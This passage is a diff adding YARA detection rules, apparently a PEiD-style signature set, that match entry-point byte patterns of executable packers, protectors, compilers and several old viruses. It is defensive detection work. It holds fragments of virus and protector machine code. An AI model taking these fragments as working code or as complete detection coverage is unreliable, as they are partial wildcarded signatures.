+		$a0 = { 60 E8 00 00 00 00 5D 81 ED 06 00 00 00 EB 05 B8 ?? ?? 42 00 64 A0 23 00 00 00 EB 03 C7 84 E8 84 C0 EB 03 C7 84 E9 75 67 B9 49 00 00 00 8D B5 C5 02 00 00 56 80 06 44 46 E2 FA 8B 8D C1 02 00 00 5E 55 51 6A 00 56 FF 95 0C 61 00 00 59 5D 40 85 C0 75 3C 80 3E 00 74 03 46 EB F8 46 E2 E3 8B C5 8B 4C 24 20 2B 85 BD 02 00 00 89 85 B9 02 00 00 80 BD B4 02 00 00 01 75 06 8B 8D 0C 61 00 00 89 8D B5 02 00 00 8D 85 0E 03 00 00 8B DD FF E0 55 68 10 10 00 00 8D 85 B4 00 00 00 50 8D 85 B4 01 00 00 50 6A 00 FF 95 18 61 00 00 5D 6A FF FF 95 10 61 00 00 44 65 62 75 67 67 65 72 20 6F 72 20 74 6F 6F 6C 20 66 6F 72 20 6D 6F 6E 69 74 6F 72 69 6E 67 20 64 65 74 65 63 74 65 64 21 21 21 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule AHTeamEPProtector03fakePECrypt102FEUERRADER
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 90 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 90 FF E0 E8 00 00 00 00 5B 83 EB 05 EB 04 52 4E 44 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule PseudoSigner02WATCOMCCEXEAnorganix
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { E9 00 00 00 00 90 90 90 90 57 41 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule PENinja
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule UpackV036Dwing
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 0B 01 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 18 10 00 00 10 00 00 00 ?? ?? ?? ?? ?? ?? ?? ?? 00 10 00 00 00 02 00 00 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 00 00 00 00 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 00 00 00 00 0A 00 00 00 00 00 00 00 00 00 00 00 ?? ?? ?? ?? 14 00 00 00 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 47 65 74 50 72 6F 63 41 64 64 72 65 73 73 00 FF 76 08 FF 76 0C BE 1C 01 }
+	$a1 = { BE ?? ?? ?? ?? FF 36 E9 C3 00 00 00 }
+
+condition:
+		$a0 at pe.entry_point or $a1 at pe.entry_point
+}
+	
+	
+rule yodasProtectorv101AshkbizDanehkar
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 55 8B EC 53 56 57 E8 03 00 00 00 EB 01 ?? E8 86 00 00 00 E8 03 00 00 00 EB 01 ?? E8 79 00 00 00 E8 03 00 00 00 EB 01 ?? E8 A4 00 00 00 E8 03 00 00 00 EB 01 ?? E8 97 00 00 00 E8 03 00 00 00 EB 01 ?? E8 2D 00 00 00 E8 03 00 00 00 EB 01 ?? 60 E8 00 00 00 00 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule UPX050070
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 60 E8 00 00 00 00 58 83 E8 3D }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule VxVCLencrypted
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 01 B9 ?? ?? 81 34 ?? ?? 46 46 E2 F8 C3 }
+	$a1 = { 01 B9 ?? ?? 81 35 ?? ?? 47 47 E2 F8 C3 }
+
+condition:
+		$a0 at pe.entry_point or $a1 at pe.entry_point
+}
+	
+	
+rule VxXRCV1015
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { E8 ?? ?? 5E 83 ?? ?? 53 51 1E 06 B4 99 CD 21 80 FC 21 ?? ?? ?? ?? ?? 33 C0 50 8C D8 48 8E C0 1F A1 ?? ?? 8B }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule RLPackv118BasicDLLaPLibAp0x
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 80 7C 24 08 01 0F 85 ?? ?? ?? ?? 60 E8 00 00 00 00 8B 2C 24 83 C4 04 8D B5 1A 04 00 00 8D 9D C1 02 00 00 33 FF E8 61 01 00 00 EB 0F FF 74 37 04 FF 34 37 FF D3 83 C4 08 83 C7 08 83 3C 37 00 75 EB 83 BD 06 04 00 00 00 74 0E 83 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule PellesC290300400DLLX86CRTLIB
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 55 89 E5 53 56 57 8B 5D 0C 8B 75 10 BF 01 00 00 00 85 DB 75 10 83 3D ?? ?? ?? ?? 00 75 07 31 C0 E9 ?? ?? ?? ?? 83 FB 01 74 05 83 FB 02 75 ?? 85 FF 74 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule UnnamedScrambler13Bp0ke
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 55 8B EC B9 08 00 00 00 6A 00 6A 00 49 75 F9 53 56 57 B8 98 56 00 10 E8 48 EB FF FF 33 C0 55 68 AC 5D 00 10 64 FF 30 64 89 20 6A 00 68 BC 5D 00 10 68 C4 5D 00 10 6A 00 E8 23 EC FF FF E8 C6 CE FF FF 6A 00 68 BC 5D 00 10 68 ?? ?? ?? ?? 6A 00 E8 0B EC FF FF E8 F2 F4 FF FF B8 08 BC 00 10 33 C9 BA 04 01 00 00 E8 C1 D2 FF FF 6A 00 68 BC 5D 00 10 68 E4 5D 00 10 6A 00 E8 E2 EB FF FF 68 04 01 00 00 68 08 BC 00 10 6A 00 FF 15 68 77 00 10 6A 00 68 BC 5D 00 10 68 FC 5D 00 10 6A 00 E8 BD EB FF FF BA 10 5E 00 10 B8 70 77 00 10 E8 CA F3 FF FF 85 C0 0F 84 F7 05 00 00 BA 74 77 00 10 8B 0D 70 77 00 10 E8 FE CD FF FF 6A 00 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule HyingsPEArmor075exeHyingCCG
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 00 00 00 00 00 00 00 00 ?? ?? 00 00 00 00 00 00 ?? ?? 01 00 00 00 00 00 00 00 00 00 56 69 72 74 75 61 6C 41 6C 6C 6F 63 00 00 00 00 00 00 00 00 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 00 00 00 00 00 00 00 00 00 74 ?? ?? ?? 00 00 00 00 00 }
+
+condition:
+		$a0
+}
+	
+	
+rule SimbiOZPolyCryptorvxxExtranger
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 55 60 E8 00 00 00 00 5D 81 ED ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 68 ?? ?? ?? ?? 50 E8 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule AVPACKv120
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 50 1E 0E 1F 16 07 33 F6 8B FE B9 ?? ?? FC F3 A5 06 BB ?? ?? 53 CB }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule Armadillov220
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 55 8B EC 6A FF 68 10 12 41 00 68 F4 A0 40 00 64 A1 00 00 00 00 50 64 89 25 00 00 00 00 83 EC 58 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule XPack167
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { B8 8C D3 15 33 75 81 3E E8 0F 00 9A E8 F9 FF 9A 9C EB 01 9A 59 80 CD 01 51 9D EB }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule NullsoftInstallSystemv1xx
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 55 8B EC 83 EC 2C 53 56 33 F6 57 56 89 75 DC 89 75 F4 BB A4 9E 40 00 FF 15 60 70 40 00 BF C0 B2 40 00 68 04 01 00 00 57 50 A3 AC B2 40 00 FF 15 4C 70 40 00 56 56 6A 03 56 6A 01 68 00 00 00 80 57 FF 15 9C 70 40 00 8B F8 83 FF FF 89 7D EC 0F 84 C3 00 00 00 }
+	$a1 = { 83 EC 0C 53 56 57 FF 15 20 71 40 00 05 E8 03 00 00 BE 60 FD 41 00 89 44 24 10 B3 20 FF 15 28 70 40 00 68 00 04 00 00 FF 15 28 71 40 00 50 56 FF 15 08 71 40 00 80 3D 60 FD 41 00 22 75 08 80 C3 02 BE 61 FD 41 00 8A 06 8B 3D F0 71 40 00 84 C0 74 0F 3A C3 74 }
+
+condition:
+		$a0 at pe.entry_point or $a1 at pe.entry_point
+}
+	
+	
+rule BobSoftMiniDelphiBoBBobSoft
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 55 8B EC 83 C4 F0 53 56 B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 33 C0 55 68 ?? ?? ?? ?? 64 FF 30 64 89 20 B8 }
+	$a1 = { 55 8B EC 83 C4 F0 53 B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 33 C0 55 68 ?? ?? ?? ?? 64 FF 30 64 89 20 B8 ?? ?? ?? ?? E8 }
+	$a2 = { 55 8B EC 83 C4 F0 B8 ?? ?? ?? ?? E8 }
+
+condition:
+		$a0 at pe.entry_point or $a1 at pe.entry_point or $a2 at pe.entry_point
+}
+	
+	
+rule UltraProV10SafeNet
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { A1 ?? ?? ?? ?? 85 C0 0F 85 3B 06 00 00 55 56 C7 05 ?? ?? ?? ?? 01 00 00 00 FF 15 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule PECompactv1242v1243
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { EB 06 68 ?? ?? ?? ?? C3 9C 60 E8 02 ?? ?? ?? 33 C0 8B C4 83 C0 04 93 8B E3 8B 5B FC 81 EB 0F 70 40 ?? 87 DD 8B 85 A6 70 40 ?? 01 85 03 70 40 ?? 66 C7 85 70 40 90 ?? 90 01 85 9E 70 40 BB ?? D2 09 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule SimplePack121build0909Method2bagie
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 4D 5A 90 EB 01 00 52 E9 8A 01 00 00 50 45 00 00 4C 01 02 00 00 00 00 00 00 00 00 00 00 00 00 00 E0 00 0F 03 0B 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0C 00 00 00 00 ?? ?? ?? 00 10 00 00 00 02 00 00 01 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 }
+
+condition:
+		$a0
+}
+	
+	
+rule Obsidium13037ObsidiumSoftware
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { EB 02 ?? ?? E8 26 00 00 00 EB 03 ?? ?? ?? EB 01 ?? 8B 54 24 0C EB 04 ?? ?? ?? ?? 83 82 B8 00 00 00 26 EB 01 ?? 33 C0 EB 02 ?? ?? C3 EB 01 ?? EB 04 ?? ?? ?? ?? 64 67 FF 36 00 00 EB 01 ?? 64 67 89 26 00 00 EB 01 ?? EB 03 ?? ?? ?? 50 EB 03 ?? ?? ?? 33 C0 EB 03 ?? ?? ?? 8B 00 EB 04 ?? ?? ?? ?? C3 EB 03 ?? ?? ?? E9 FA 00 00 00 EB 03 ?? ?? ?? E8 D5 FF FF FF EB 04 ?? ?? ?? ?? EB 01 ?? 58 EB 02 ?? ?? EB 03 ?? ?? ?? 64 67 8F 06 00 00 EB 01 ?? 83 C4 04 EB 03 ?? ?? ?? E8 23 27 00 00 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule VxPhoenix927
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { E8 00 00 5E 81 C6 ?? ?? BF 00 01 B9 04 00 F3 A4 E8 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule Petite14c199899IanLuck
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 66 9C 60 50 8B D8 03 00 68 54 BC 00 00 6A 00 FF 50 14 8B CC 8D A0 54 BC 00 00 50 8B C3 8D 90 ?? 16 00 00 68 00 00 ?? ?? 51 50 80 04 24 08 50 80 04 24 42 50 80 04 24 61 50 80 04 24 9D 50 80 04 24 BB 83 3A 00 0F 84 D8 14 00 00 8B 44 24 18 F6 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule eXPressorV10CGSoftLabs
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { E9 35 14 00 00 E9 31 13 00 00 E9 98 12 00 00 E9 EF 0C 00 00 E9 42 13 00 00 E9 E9 02 00 00 E9 EF 0B 00 00 E9 1B 0D 00 00 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule RECryptv07xCruddRETh2
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 60 E8 00 00 00 00 5D 55 81 04 24 0A 00 00 00 C3 8B F5 81 C5 ?? ?? 00 00 89 6D 34 89 75 38 8B 7D 38 81 E7 00 FF FF FF 81 C7 48 00 00 00 47 03 7D 60 8B 4D 5C 83 F9 00 7E 0F 8B 17 33 55 58 89 17 83 C7 04 83 C1 FC EB EC 8B }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule PassEXEv20
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 06 1E 0E 0E 07 1F BE ?? ?? B9 ?? ?? 87 14 81 ?? ?? ?? EB ?? C7 ?? ?? ?? 84 00 87 ?? ?? ?? FB 1F 58 4A }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule RECryptv07xCruddRETh1
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 60 E8 00 00 00 00 5D 81 ED F3 1D 40 00 B9 7B 09 00 00 8D BD 3B 1E 40 00 8B F7 61 60 E8 00 00 00 00 5D 55 81 04 24 0A 00 00 00 C3 8B F5 81 C5 ?? ?? 00 00 89 6D 34 89 75 38 8B 7D 38 81 E7 00 FF FF FF 81 C7 48 00 00 00 47 03 7D 60 8B 4D 5C 83 F9 00 7E 0F 8B }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule WIBUKeyV410Ahttpwibucomus
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { F7 05 ?? ?? ?? ?? FF 00 00 00 75 12 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule Mew501NorthFoxHCC
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { BE 5B 00 40 00 AD 91 AD 93 53 AD 96 56 5F AC C0 C0 ?? 04 ?? C0 C8 ?? AA E2 F4 C3 00 ?? ?? 00 ?? ?? ?? 00 00 10 40 00 4D 45 57 20 30 2E 31 20 62 79 20 4E 6F 72 74 68 66 6F 78 00 4D 45 57 20 30 2E 31 20 62 79 20 4E 6F 72 74 68 66 6F 78 00 4D 45 57 20 30 2E 31 20 62 79 20 4E 6F 72 74 68 66 6F 78 00 4D 45 57 20 30 2E 31 20 62 79 20 4E 6F 72 74 68 66 6F 78 00 4D }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule PseudoSigner01ExeSmasherAnorganix
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 9C FE 03 90 60 BE 90 90 41 90 8D BE 90 10 FF FF 57 83 CD FF EB 10 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 FE 0B E9 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule UnnamedScrambler12C12Dp0ke
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 55 8B EC B9 05 00 00 00 6A 00 6A 00 49 75 F9 51 53 56 57 B8 ?? 3A ?? ?? E8 ?? EC FF FF 33 C0 55 68 ?? ?? ?? ?? 64 FF 30 64 89 20 E8 ?? D7 FF FF E8 ?? ?? FF FF B8 20 ?? ?? ?? 33 C9 BA 04 01 00 00 E8 ?? DB FF FF 68 04 01 00 00 68 20 ?? ?? ?? 6A 00 FF 15 10 ?? ?? ?? BA ?? ?? ?? ?? B8 14 ?? ?? ?? E8 ?? ?? FF FF 85 C0 0F 84 ?? 04 00 00 BA 18 ?? ?? ?? 8B 0D 14 ?? ?? ?? E8 ?? ?? FF FF 8B 05 88 ?? ?? ?? 8B D0 B8 54 ?? ?? ?? E8 ?? E3 FF FF B8 54 ?? ?? ?? E8 ?? E2 FF FF 8B D0 B8 18 ?? ?? ?? 8B 0D 88 ?? ?? ?? E8 ?? D6 FF FF FF 35 34 ?? ?? ?? FF 35 30 ?? ?? ?? FF 35 3C ?? ?? ?? FF 35 38 ?? ?? ?? 8D 55 E8 A1 88 ?? ?? ?? E8 ?? F0 FF FF 8B 55 E8 B9 54 }
+
+condition:
+		$a0
+}
+	
+	
+rule AlexProtectorv04beta1byAlex
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 60 E8 01 00 00 00 C7 83 C4 04 33 C9 E8 01 00 00 00 68 83 C4 04 E8 01 00 00 00 68 83 C4 04 B9 ?? 00 00 00 E8 01 00 00 00 68 83 C4 04 E8 00 00 00 00 E8 01 00 00 00 C7 83 C4 04 8B 2C 24 83 C4 04 E8 01 00 00 00 A9 83 C4 04 81 ED 3C 13 40 00 E8 01 00 00 00 68 }
+
+condition:
+		$a0
+}
+	
+	
+rule UG2002Cruncherv03b3
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 60 E8 ?? ?? ?? ?? 5D 81 ED ?? ?? ?? ?? E8 0D ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 58 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule FishPEShield101HellFish
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 55 8B EC 83 C4 D0 53 56 57 8B 45 10 83 C0 0C 8B 00 89 45 DC 83 7D DC 00 75 08 E8 AD FF FF FF 89 45 DC E8 C1 FE FF FF 8B 10 03 55 DC 89 55 E4 83 C0 04 8B 10 89 55 FC 83 C0 04 8B 10 89 55 F4 83 C0 04 8B 10 89 55 F8 83 C0 04 8B 10 89 55 F0 83 C0 04 8B 10 89 55 EC 83 C0 04 8B 00 89 45 E8 8B 45 E4 8B 58 04 03 5D E4 8B FB 8B 45 E4 8B 30 4E 85 F6 72 2B 46 C7 45 E0 00 00 00 00 83 7B 04 00 74 14 }
+	$a1 = { 60 E8 12 FE FF FF C3 90 09 00 00 00 2C 00 00 00 ?? ?? ?? ?? C4 03 00 00 BC A0 00 00 00 40 01 00 ?? ?? ?? ?? 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 99 00 00 00 00 8A 00 00 00 10 00 00 28 88 00 00 40 ?? 4B 00 00 00 02 00 00 00 A0 00 00 18 01 00 00 40 ?? 4C 00 00 00 0C 00 00 00 B0 00 00 38 0A 00 00 40 ?? 4E 00 00 00 00 00 00 00 C0 00 00 40 39 00 00 40 ?? 4E 00 00 00 08 00 00 00 00 01 00 C8 06 00 00 40 }
+
+condition:
+		$a0 or $a1 at pe.entry_point
+}
+	
+	
+rule PseudoSigner01Neolite20Anorganix
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { E9 A6 00 00 00 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule PEIntrov10
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 8B 04 24 9C 60 E8 ?? ?? ?? ?? 5D 81 ED 0A 45 40 ?? 80 BD 67 44 40 ?? ?? 0F 85 48 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule Obsidiumv1250ObsidiumSoftware
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { E8 0E 00 00 00 8B 54 24 0C 83 82 B8 00 00 00 0D 33 C0 C3 64 67 FF 36 00 00 64 67 89 26 00 00 50 33 C0 8B 00 C3 E9 FA 00 00 00 E8 D5 FF FF FF 58 64 67 8F 06 00 00 83 C4 04 E8 2B 13 00 00 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule DevC4992BloodshedSoftware
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 55 89 E5 83 EC 08 C7 04 24 01 00 00 00 FF 15 ?? ?? ?? 00 E8 C8 FE FF FF 90 8D B4 26 00 00 00 00 55 89 E5 83 EC 08 C7 04 24 02 00 00 00 FF 15 ?? ?? ?? 00 E8 A8 FE FF FF 90 8D B4 26 00 00 00 00 55 8B 0D ?? ?? ?? 00 89 E5 5D FF E1 8D 74 26 00 55 8B 0D }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule RLPackV119DllLZMA430ap0x
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 80 7C 24 08 01 0F 85 C7 01 00 00 60 E8 00 00 00 00 8B 2C 24 83 C4 04 83 7C 24 28 01 75 0C 8B 44 24 24 89 85 49 0B 00 00 EB 0C 8B 85 45 0B 00 00 89 85 49 0B 00 00 8D B5 6D 0B 00 00 8D 9D 2F 03 00 00 33 FF 6A 40 68 00 10 00 00 68 00 20 0C 00 6A 00 FF 95 DA 0A 00 00 89 85 41 0B 00 00 E8 76 01 00 00 EB 20 60 8B 85 49 0B 00 00 FF B5 41 0B 00 00 FF 34 37 01 04 24 FF 74 37 04 01 04 24 FF D3 61 83 C7 08 83 3C 37 00 75 DA 83 BD 55 0B 00 00 00 74 0E 83 BD 59 0B 00 00 00 74 05 E8 D7 01 00 00 8D 74 37 04 53 6A 40 68 00 10 00 00 68 ?? ?? ?? ?? 6A 00 FF 95 DA 0A 00 00 89 85 69 0B 00 00 5B 60 FF B5 41 0B 00 00 56 FF B5 69 0B 00 00 FF D3 61 8B B5 69 0B 00 00 8B C6 EB 01 40 80 38 01 75 FA 40 8B 38 03 BD 49 0B 00 00 83 C0 04 89 85 65 0B 00 00 E9 98 00 00 00 56 FF 95 D2 0A 00 00 89 85 61 0B 00 00 85 C0 0F 84 C8 00 00 00 8B C6 EB 5F 8B 85 65 0B 00 00 8B 00 A9 00 00 00 80 74 14 35 00 00 00 80 50 8B 85 65 0B 00 00 C7 00 20 20 20 00 EB 06 FF B5 65 0B 00 00 FF B5 61 0B 00 00 FF 95 D6 0A 00 00 85 C0 0F 84 87 00 00 00 89 07 83 C7 04 8B 85 65 0B 00 00 EB 01 40 80 38 00 75 FA 40 89 85 65 0B 00 00 66 81 78 02 00 80 74 A1 80 38 00 75 9C EB 01 46 80 3E 00 75 FA 46 40 8B 38 03 BD 49 0B 00 00 83 C0 04 89 85 65 0B 00 00 80 3E 01 0F 85 5F FF FF FF 68 00 40 00 00 68 ?? ?? ?? ?? FF B5 69 0B 00 00 FF 95 DE 0A 00 00 68 00 40 00 00 68 00 20 0C 00 FF B5 41 0B 00 00 FF 95 DE 0A 00 00 E8 3D 00 00 00 E8 24 01 00 00 61 E9 ?? ?? ?? ?? 61 C3 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule XJXPALLiNSoN
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 55 8B EC 6A FF 68 ?? ?? 40 00 68 ?? ?? 40 00 64 A1 00 00 00 00 50 64 89 25 00 00 00 00 83 EC 44 53 56 57 66 9C }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule Armadillov220b1
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 55 8B EC 6A FF 68 30 12 41 00 68 A4 A5 40 00 64 A1 00 00 00 00 50 64 89 25 00 00 00 00 83 EC 58 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule RCryptor20Vaska
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { F7 D1 83 F1 FF 6A 00 F7 D1 83 F1 FF 81 04 24 ?? ?? ?? ?? F7 D1 83 F1 FF }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule SentinelSuperProAutomaticProtectionv641Safenet
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { A1 ?? ?? ?? ?? 55 8B ?? ?? ?? 85 C0 74 ?? 85 ED 75 ?? A1 ?? ?? ?? ?? 50 55 FF 15 ?? ?? ?? ?? 8B 0D ?? ?? ?? ?? 55 51 FF 15 ?? ?? ?? ?? 85 C0 74 ?? 8B 15 ?? ?? ?? ?? 52 FF 15 ?? ?? ?? ?? 6A 00 6A 00 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? B8 01 00 00 00 5D C2 0C 00 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule TMTPascalv040
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 0E 1F 06 8C 06 ?? ?? 26 A1 ?? ?? A3 ?? ?? 8E C0 66 33 FF 66 33 C9 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule PseudoSigner02CrunchPEHeuristicAnorganix
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 55 E8 0E 00 00 00 5D 83 ED 06 8B C5 55 60 89 AD ?? ?? ?? ?? 2B 85 00 00 00 00 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule MSLRHv032afakeMSVCDLLMethod4emadicius
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 55 8B EC 56 57 BF 01 00 00 00 8B 75 0C 85 F6 5F 5E 5D EB 05 E8 EB 04 40 00 EB FA E8 0A 00 00 00 E8 EB 0C 00 00 E8 F6 FF FF FF E8 F2 FF FF FF 83 C4 08 74 04 75 02 EB 02 EB 01 81 50 E8 02 00 00 00 29 5A 58 6B C0 03 E8 02 00 00 00 29 5A 83 C4 04 58 74 04 75 02 EB 02 EB 01 81 0F 31 50 0F 31 E8 0A 00 00 00 E8 EB 0C 00 00 E8 F6 FF FF FF E8 F2 FF FF FF }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule VcAsmProtectorV10XVcAsm
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 55 8B EC 6A FF 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 64 A1 00 00 00 00 50 64 89 25 00 00 00 00 E8 03 00 00 00 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule VBOXv42MTE
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 8C E0 0B C5 8C E0 0B C4 03 C5 74 00 74 00 8B C5 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule MSLRHv032afakeUPX0896102105124emadicius
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 60 BE 00 90 8B 00 8D BE 00 80 B4 FF 57 83 CD FF EB 3A 90 90 90 90 90 90 8A 06 46 88 07 47 01 DB 75 07 8B 1E 83 EE FC 11 DB 72 ED B8 01 00 00 00 01 DB 75 07 8B 1E 83 EE FC 11 DB 11 C0 01 DB 73 0B 75 19 8B 1E 83 EE FC 11 DB 72 10 58 61 90 EB 05 E8 EB 04 40 00 EB FA E8 0A 00 00 00 E8 EB 0C 00 00 E8 F6 FF FF FF E8 F2 FF FF FF 83 C4 08 74 04 75 02 EB 02 EB 01 81 50 E8 02 00 00 00 29 5A 58 6B C0 03 E8 02 00 00 00 29 5A 83 C4 04 58 74 04 75 02 EB 02 EB 01 81 0F 31 50 0F 31 E8 0A 00 00 00 E8 EB 0C 00 00 E8 F6 FF FF FF E8 F2 FF FF FF }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule FSGv110EngdulekxtBorlandDelphiMicrosoftVisualC
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 1B DB E8 02 00 00 00 1A 0D 5B 68 80 ?? ?? 00 E8 01 00 00 00 EA 5A 58 EB 02 CD 20 68 F4 00 00 00 EB 02 CD 20 5E 0F B6 D0 80 CA 5C 8B 38 EB 01 35 EB 02 DC 97 81 EF F7 65 17 43 E8 02 00 00 00 97 CB 5B 81 C7 B2 8B A1 0C 8B D1 83 EF 17 EB 02 0C 65 83 EF 43 13 }
